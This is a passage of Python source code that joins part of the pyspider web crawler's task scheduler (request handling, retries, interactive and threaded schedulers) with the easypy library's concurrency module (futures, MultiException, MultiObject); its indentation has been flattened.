self.xmlrpc_ioloop.start()
def on_request(self, task):
task_log(task, 'on request')
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
# when a task is in processing, the modify may conflict with the running task.
# postpone the modify after task finished.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s', task)
task_monitor(task, 'success')
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
task_monitor(task, 'failed')
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
task_monitor(task, 'retry')
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
# inject informations about project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler Mixin class for one mode
overwirted send_task method
call processor.on_task(fetcher.fetch(task)) instead of consuming queue
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
raise LookupError('You need specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
task_log(task, 'do task')
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
type, task, response = result.args
self.processor.on_task(task, response)
# do with message
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# do with results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
raise self.outqueue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
|
concurrency.py
|
# encoding: utf-8
"""
This module helps you run things concurrently.
Most useful are the ``concurrent`` context manager and the ``MultiObject`` class.
The features in this module are integrated with the ``logging`` module, to provide
thread-context to log messages. It also has support for integration ``gevent``.
``MultiObject``
Here's how you would, for example, concurrently send a message to a bunch of servers::
responses = MultiObject(servers).send('Hello')
The above replaces the following threading boiler-plate code::
from threading import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=3) as executor:
futures = [
executor.submit(server.send, args=['Hello'])
for server in servers]
responses = [future.result() for future in futures]```
``concurrent``
A high-level thread controller.
As a context manager, it runs a function in a thread, and joins it upon exiting the context
with concurrent(requests.get, "api.myserver.com/data") as future:
my_data = open("local_data").read()
remote_data = future.result()
process_it(my_data, remote_data)
It can also be used to run something repeatedly in the background:
concurrent(send_heartbeat, loop=True, sleep=5).start() # until the process exits
with concurrent(print_status, loop=True, sleep=5):
some_long_task()
Environment variables
EASYPY_DISABLE_CONCURRENCY (yes|no|true|false|1|0)
EASYPY_MAX_THREAD_POOL_SIZE
Important notes
* Exception.timestamp
Exceptions raised in functions that use the features here may get a ``timestamp`` attribute that
records the precise time those exceptions were raised. This is useful when there's a lag between
when the exception was raised within a thread, and when that exception was finally propagated to
the calling thread.
"""
from concurrent.futures import ThreadPoolExecutor, CancelledError, as_completed, Future, wait as futures_wait
from concurrent.futures import TimeoutError as FutureTimeoutError
from collections import defaultdict
from contextlib import contextmanager, ExitStack
from functools import partial, wraps
from importlib import import_module
from itertools import chain
from traceback import format_tb
import inspect
import logging
import threading
import time
import os
from collections import namedtuple
from datetime import datetime
import easypy._multithreading_init # noqa; make it initialize the threads tree
from easypy.exceptions import PException, apply_timestamp
from easypy.gevent import is_module_patched, non_gevent_sleep, defer_to_thread
from easypy.humanize import IndentableTextBuffer, time_duration, compact
from easypy.humanize import format_thread_stack, yesno_to_bool
from easypy.threadtree import iter_thread_frames
from easypy.timing import Timer
from easypy.units import MINUTE, HOUR
from easypy.colors import colorize, uncolored
from easypy.sync import SynchronizationCoordinator, ProcessExiting, raise_in_main_thread
MAX_THREAD_POOL_SIZE = int(os.environ.get('EASYPY_MAX_THREAD_POOL_SIZE', 50))
DISABLE_CONCURRENCY = yesno_to_bool(os.getenv("EASYPY_DISABLE_CONCURRENCY", "no"))
this_module = import_module(__name__)
THREADING_MODULE_PATHS = [threading.__file__]
IS_GEVENT = False
if is_module_patched("threading"):
IS_GEVENT = True
import gevent
MAX_THREAD_POOL_SIZE *= 100 # these are not threads anymore, but greenlets. so we allow a lot of them
THREADING_MODULE_PATHS.append(gevent.__path__[0])
try:
from traceback import _extract_stack_iter
except ImportError:
from traceback import walk_stack
def _extract_stack_iter(frame):
for f, lineno in walk_stack(frame):
co = f.f_code
filename = co.co_filename
name = co.co_name
yield filename, lineno, name
_logger = logging.getLogger(__name__)
def disable():
"""
Force MultiObject and concurrent calls to run synchronuously in the current thread.
For debugging purposes.
"""
global DISABLE_CONCURRENCY
DISABLE_CONCURRENCY = True
logging.info("Concurrency disabled")
def enable():
"""
Re-enable concurrency, after disabling it
"""
global DISABLE_CONCURRENCY
DISABLE_CONCURRENCY = False
logging.info("Concurrency enabled")
def _find_interesting_frame(f):
"""
Find the next frame in the stack that isn't threading-related, to get to the actual caller.
"""
default = next(_extract_stack_iter(f))
non_threading = (
p for p in _extract_stack_iter(f)
if all(not p[0].startswith(pth) for pth in THREADING_MODULE_PATHS))
return next(non_threading, default)
class MultiExceptionMeta(type):
"""
This metaclass helps generate MultiException subtypes so that it's easier
to catch a MultiException with a specific common type, for example::
try:
MultiObject(servers).connect()
except MultiException[ConnectionError]:
pass
See ``MultiException`` for more information.
"""
_SUBTYPES = {}
_SUBTYPES_LOCK = threading.RLock()
def __getitem__(cls, exception_type):
if exception_type is BaseException:
return MultiException
assert isinstance(exception_type, type), "Must use an Exception type"
assert issubclass(exception_type, BaseException), "Must inherit for BaseException"
try:
return cls._SUBTYPES[exception_type]
except KeyError:
with cls._SUBTYPES_LOCK:
if exception_type in cls._SUBTYPES:
return cls._SUBTYPES[exception_type]
bases = tuple(cls[base] for base in exception_type.__bases__ if base and issubclass(base, BaseException))
subtype = type("MultiException[%s]" % exception_type.__qualname__, bases, dict(COMMON_TYPE=exception_type))
cls._SUBTYPES[exception_type] = subtype
return subtype
__iter__ = None
def __call__(cls, exceptions, futures):
common_type = concestor(*map(type, filter(None, exceptions)))
subtype = cls[common_type]
return type.__call__(subtype, exceptions, futures)
PickledFuture = namedtuple("PickledFuture", "ctx, funcname")
class MultiException(PException, metaclass=MultiExceptionMeta):
"""
A ``MultiException`` subtype is raised when a ``MultiObject`` call fails in one or more of its threads.
The exception contains the following members:
:param actual: a MultiObject of all exceptions raised in the ``MultiObject`` call
:param count: the number of threads that raised an exception
:param invocations_count: the total number of calls the ``MultiObject`` made (the size of the ``MultiObject``)
:param common_type: the closest common ancestor (base-class) of all the exceptions
:param one: a sample exception (the first)
:param futures: a MultiObject of futures (:concurrent.futures.Future:) that were created in the ``MultiObject`` call
:param exceptions: a sparse list of exceptions corresponding to the MultiObject threads
:param complete: ``True`` if all threads failed on exception
"""
template = "{0.common_type.__qualname__} raised from concurrent invocation (x{0.count}/{0.invocations_count})"
def __reduce__(self):
return (MultiException, (self.exceptions, [PickledFuture(ctx=f.ctx, funcname=f.funcname) for f in self.futures]))
def __init__(self, exceptions, futures):
# we want to keep futures in parallel with exceptions,
# so some exceptions could be None
assert len(futures) == len(exceptions)
self.actual = MultiObject(filter(None, exceptions))
self.count = len(self.actual)
self.invocations_count = len(futures)
self.common_type = self.COMMON_TYPE
self.one = self.actual.T[0] if self.actual else None
self.futures = MultiObject(futures)
self.exceptions = exceptions
self.complete = self.count == self.invocations_count
if self.complete and hasattr(self.common_type, 'exit_with_code'):
self.exit_with_code = self.common_type.exit_with_code
super().__init__(self.template, self)
def __repr__(self):
return "{0.__class__.__name__}(x{0.count}/{0.invocations_count})".format(self)
def __str__(self):
return self.render(color=False)
def walk(self, skip_multi_exceptions=True):
if not skip_multi_exceptions:
yield self
for exc in self.actual:
if isinstance(exc, MultiException):
yield from exc.walk(skip_multi_exceptions=skip_multi_exceptions)
else:
yield exc
def render(self, *, width=80, color=True, **kw):
buff = self._get_buffer(color=color, **kw)
text = buff.render(width=width, edges=not color)
return colorize("\n" + text)
def _get_buffer(self, **kw):
if kw.get("color", True):
normalize_color = lambda x: x
else:
normalize_color = uncolored
def _format_context(context):
if not isinstance(context, dict):
return repr(context) # when it comes from rpyc
context = context.copy()
context.pop("indentation", None)
breadcrumbs = ";".join(context.pop('context', []))
return ", ".join(filter(None, chain((breadcrumbs,), ("%s=%s" % p for p in sorted(context.items())))))
buff = IndentableTextBuffer("{0.__class__.__qualname__}", self)
if self.message:
buff.write(normalize_color("WHITE<<%s>>" % self.message))
traceback_fmt = normalize_color("DARK_GRAY<<{}>>")
# workaround incompatibilty with rpyc, which serializes .actual into an str
# instead of a list of exceptions. This makes the string flatten into a long
# and incomprehensible text buffer.
if hasattr(self, "_remote_tb"):
with buff.indent("Remote Traceback:"):
buff.write(self._remote_tb)
return buff
def add_details(exc):
if kw.get("timestamp", True) and getattr(exc, "timestamp", None):
ts = datetime.fromtimestamp(exc.timestamp).isoformat()
buff.write(normalize_color("MAGENTA<<Timestamp: %s>>" % ts))
if kw.get("context", True) and getattr(exc, "context", None):
buff.write("Context: %s" % _format_context(exc.context))
add_details(self)
for exc in self.actual:
with buff.indent("{.__class__.__qualname__}", exc):
if isinstance(exc, MultiException):
buff.extend(exc._get_buffer(**kw))
elif callable(getattr(exc, "render", None)):
buff.write(exc.render(**kw))
else:
buff.write("{}", exc)
add_details(exc)
if hasattr(exc, "__traceback__"):
show_traceback = getattr(exc, 'traceback', None)
if show_traceback is not False:
buff.write("Traceback:")
for line in format_tb(exc.__traceback__):
buff.write(traceback_fmt, line.rstrip())
return buff
def _submit_execution(executor, func, args, kwargs, ctx, funcname=None):
"""
This helper takes care of submitting a function for asynchronous execution, while wrapping and storing
useful information for tracing it in logs (for example, by ``Futures.dump_stacks``)
"""
future = executor.submit(_run_with_exception_logging, func, args, kwargs, ctx)
future.ctx = ctx
future.funcname = funcname or _get_func_name(func)
return future
class Futures(list):
"""
A collection of ``Future`` objects.
"""
def done(self):
"""
Return ``True`` if all futures are done
"""
return all(f.done() for f in self)
def cancelled(self):
"""
Return ``True`` if all futures are cancelled
"""
return all(f.cancelled() for f in self)
def running(self):
"""
Return ``True`` if all futures are running
"""
return all(f.running() for f in self)
def wait(self, timeout=None):
"""
Wait for all Futures to complete
"""
return futures_wait(self, timeout=timeout)
def result(self, timeout=None):
"""
Wait and return the results from all futures as an ordered list.
Raises a ``MultiException`` if one or more exceptions are raised.
"""
me = self.exception(timeout=timeout)
if me:
if isinstance(me, MultiException[ProcessExiting]):
# we want these aborted MultiObject threads to consolidate this exception
raise ProcessExiting()
raise me
return [f.result() for f in self]
def exception(self, timeout=None):
"""
Wait and return a ``MultiException`` if there any exceptions, otherwise returns ``None``.
"""
exceptions = [f.exception(timeout=timeout) for f in self]
if any(exceptions):
return MultiException(exceptions=exceptions, futures=self)
def cancel(self):
"""
Cancel all futures.
"""
cancelled = [f.cancel() for f in self] # list-comp, to ensure we call cancel on all futures
return all(cancelled)
def as_completed(self, timeout=None):
"""
Returns an iterator yielding the futures in order of completion.
Wraps `concurrent.futures.as_completed`.
"""
return as_completed(self, timeout=timeout)
@classmethod
@contextmanager
def execution(cls, workers=None, ctx={}):
"""
A context-manager for scheduling asynchronous executions and waiting on them as upon exiting the context::
With Futures.execution() as futures:
for task in tasks:
futures.submit(task)
results = futures.results()
"""
if workers is None:
workers = MAX_THREAD_POOL_SIZE
class PooledFutures(cls):
killed = False
def submit(self, func, *args, log_ctx={}, **kwargs):
"Submit a new asynchronous task to this executor"
_ctx = dict(ctx, **log_ctx)
future = executor.submit(_run_with_exception_logging, func, args, kwargs, _ctx)
future.ctx = _ctx
future.funcname = _get_func_name(func)
self.append(future)
return future
def kill(self):
"Kill the executor and discard any running tasks"
self.cancel()
self.shutdown(wait=False)
while executor._threads:
thread = executor._threads.pop()
if getattr(thread, "_greenlet", None):
thread._greenlet.kill()
self.killed = True
def shutdown(self, *args, **kwargs):
executor.shutdown(*args, **kwargs)
with ThreadPoolExecutor(workers) as executor:
futures = PooledFutures()
try:
yield futures
except: # noqa
_logger.debug("shutting down ThreadPoolExecutor due to exception")
futures.kill()
raise
else:
if not futures.killed:
# force exceptions to bubble up
futures.result()
finally:
# break the cycle so that the GC doesn't clean up the executor under a lock (https://bugs.python.org/issue21009)
futures.kill = futures.shutdown = futures.submit = None
futures = None
executor = execution # for backwards compatibility
@classmethod
def dump_stacks(cls, futures, verbose=False):
"""
Logs the stack frame for each of the given futures.
The Future objects must have been submitted with ``_submit_execution`` so that they contain
the necessary information.
"""
frames = dict(iter_thread_frames())
for i, future in enumerate(futures, 1):
thread_ident = future.ctx['thread_ident']
try:
frame = frames[thread_ident]
except KeyError:
assert False, frames
frame = None # this might happen in race-conditions with a new thread starting
if not verbose or not frame:
if frame:
frame_line = _find_interesting_frame(frame)[:3]
location = " - %s:%s, in %s(..)" % tuple(frame_line)
else:
location = "..."
_logger.info("%3s - %s (DARK_YELLOW<<%s>>)%s",
i, future.funcname, cls._get_context(future), location)
continue
with _logger.indented("%3s - %s (%s)", i, future.funcname, cls._get_context(future), footer=False):
lines = format_thread_stack(frame, skip_modules=[this_module]).splitlines()
for line in lines:
_logger.info(line.strip())
@classmethod
def _get_context(cls, future: Future):
"""
Get interesting context information about this future object (as long as it was submitted by _submit_execution)
"""
def compacted(s):
return compact(str(s).split("\n", 1)[0], 20, "....", 5).strip()
ctx = dict(future.ctx)
context = []
threadname = ctx.pop("threadname", None)
thread_ident = ctx.pop("thread_ident", None)
context.append(threadname or thread_ident)
context.append(ctx.pop("context", None))
context.extend("%s=%s" % (k, compacted(v)) for k, v in sorted(ctx.items()))
return ";".join(filter(None, context))
def logged_wait(self, timeout=None, initial_log_interval=2 * MINUTE):
"""
Wait for all futures to complete, logging their status along the way.
Logging will occur at an every-increasing log interval, beginning with ``initial_log_interval``,
and increasing 5-fold (x5) every 5 iterations.
"""
log_interval = initial_log_interval
global_timer = Timer(expiration=timeout)
iteration = 0
while not global_timer.expired:
completed, pending = self.wait(log_interval)
if not pending:
break
iteration += 1
if iteration % 5 == 0:
log_interval *= 5
with _logger.indented("(Waiting for %s on %s/%s tasks...)",
time_duration(global_timer.elapsed),
len(pending), sum(map(len, (completed, pending))),
level=logging.WARNING, footer=False):
self.dump_stacks(pending, verbose=global_timer.elapsed >= HOUR)
def _run_with_exception_logging(func, args, kwargs, ctx):
"""
Use as a wrapper for functions that run asynchronously, setting up a logging context and
recording the thread in-which they are running, so that we can later log their progress
and identify the source of exceptions they raise. In addition, it stamps any exception
raised from the function with the current time.
"""
thread = threading.current_thread()
ctx.update(threadname=thread.name, thread_ident=thread.ident)
with _logger.context(**ctx):
try:
return func(*args, **kwargs)
except StopIteration:
# no need to log this
raise
except ProcessExiting as exc:
_logger.debug(exc)
raise
except Exception as exc:
_logger.silent_exception(
"Exception (%s) in thread running %s (traceback in debug logs)",
exc.__class__.__qualname__, func)
try:
exc.timestamp = time.time()
except: # noqa - sometimes exception objects are immutable
pass
raise
def _to_args_list(params):
"Helper for normalizing a list of parameters to be mapped on a function"
# We use type(args) == tuple because isinstance will return True for namedtuple
return [args if type(args) == tuple else (args,) for args in params]
def _get_func_name(func):
"Helper for finding an appropriate name for the given callable, handling ``partial`` objects."
kw = {}
while isinstance(func, partial):
if func.keywords:
kw.update(func.keywords)
func = func.func
funcname = func.__qualname__
if kw:
funcname += "(%s)" % ", ".join("%s=%r" % p for p in sorted(kw.items()))
return funcname
def _to_log_contexts(params, log_contexts):
"Helper for normalizing a list of parameters and log-contexts into a list of usable log context dicts"
if not log_contexts:
log_contexts = (dict(context=str(p) if len(p) > 1 else str(p[0])) for p in params)
else:
log_contexts = (p if isinstance(p, dict) else dict(context=str(p))
for p in log_contexts)
return log_contexts
@contextmanager
def asynchronous(func, params=None, workers=None, log_contexts=None, final_timeout=2.0, **kw):
"""
Map the list of tuple-parameters onto asynchronous calls to the specified function::
with asynchronous(connect, [(host1,), (host2,), (host3,)]) as futures:
...
connections = futures.results()
:param func: The callable to invoke asynchronously.
:param params: A list of tuples to map onto the function.
:param workers: The number of workers to use. Defaults to the number of items in ``params``.
:param log_contexts: A optional list of logging context objects, matching the items in ``params``.
:param final_timeout: The amount of time to allow for the futures to complete after exiting the asynchronous context.
"""
if params is None:
params = [()]
if not isinstance(params, list): # don't use listify - we want to listify tuples too
params = [params]
params = _to_args_list(params)
log_contexts = _to_log_contexts(params, log_contexts)
if workers is None:
workers = min(MAX_THREAD_POOL_SIZE, len(params))
try:
signature = inspect.signature(func)
except ValueError:
# In Python 3.5+, inspect.signature returns this for built-in types
pass
else:
if '_sync' in signature.parameters and '_sync' not in kw:
assert len(params) <= workers, 'SynchronizationCoordinator with %s tasks but only %s workers' % (len(params), workers)
synchronization_coordinator = SynchronizationCoordinator(len(params))
kw['_sync'] = synchronization_coordinator
func = synchronization_coordinator._abandon_when_done(func)
if not params:
# noop
yield Futures()
return
with Futures.executor(workers=workers) as futures:
for args, ctx in zip(params, log_contexts):
futures.submit(func, *args, log_ctx=ctx, **kw)
yield futures
def concurrent_find(func, params, **kw):
assert not DISABLE_CONCURRENCY, "concurrent_find runs only with concurrency enabled"
timeout = kw.pop("concurrent_timeout", None)
with asynchronous(func, list(params), **kw) as futures:
future = None
try:
for future in futures.as_completed(timeout=timeout):
if not future.exception() and future.result():
futures.kill()
return future.result()
else:
if future:
return future.result()
except FutureTimeoutError as exc:
if not timeout:
# ??
raise
futures.kill()
_logger.warning("Concurrent future timed out (%s)", exc)
def nonconcurrent_map(func, params, log_contexts=None, **kw):
futures = Futures()
log_contexts = _to_log_contexts(params, log_contexts)
has_exceptions = False
for args, ctx in zip(_to_args_list(params), log_contexts):
future = Future()
futures.append(future)
try:
result = _run_with_exception_logging(func, args, kw, ctx)
except Exception as exc:
has_exceptions = True
future.set_exception(exc)
else:
future.set_result(result)
if has_exceptions:
exceptions = [f.exception() for f in futures]
raise MultiException(exceptions=exceptions, futures=futures)
results = [f.result() for f in futures]
del futures[:]
return results
def concurrent_map(func, params, workers=None, log_contexts=None, initial_log_interval=None, **kw):
if DISABLE_CONCURRENCY or len(params) == 1:
return nonconcurrent_map(func, params, log_contexts, **kw)
with asynchronous(func, list(params), workers, log_contexts, **kw) as futures:
futures.logged_wait(initial_log_interval=initial_log_interval)
return futures.result()
# This metaclass helps generate MultiObject subtypes for specific object types
class MultiObjectMeta(type):
_SUBTYPES = {}
_SUBTYPES_LOCK = threading.RLock()
def __getitem__(cls, typ):
try:
return cls._SUBTYPES[typ]
except KeyError:
with cls._SUBTYPES_LOCK:
if typ in cls._SUBTYPES:
return cls._SUBTYPES[typ]
bases = tuple(cls[base] for base in typ.__bases__ if base) or (MultiObject, )
subtype = type("MultiObject[%s]" % typ.__qualname__, bases, dict(CONCESTOR=typ))
cls._SUBTYPES[typ] = subtype
return subtype
__iter__ = None
def __call__(cls, items=None, *args, **kwargs):
items = tuple(items if items else [])
common_type = concestor(*map(type, items))
if not issubclass(common_type, cls.CONCESTOR):
raise TypeError("%s is not a type of %s" % (common_type, cls.CONCESTOR))
subtype = cls[common_type]
return type.__call__(subtype, items, *args, **kwargs)
class MultiObject(object, metaclass=MultiObjectMeta):
CONCESTOR = object
def __init__(self, items=None, log_ctx=None, workers=None, initial_log_interval=None):
self._items = tuple(items) if items else ()
self._workers = workers
self._initial_log_interval = initial_log_interval
cstr = self.CONCESTOR
if hasattr(cstr, '_multiobject_log_ctx'):
# override the given log_ctx if the new items have it
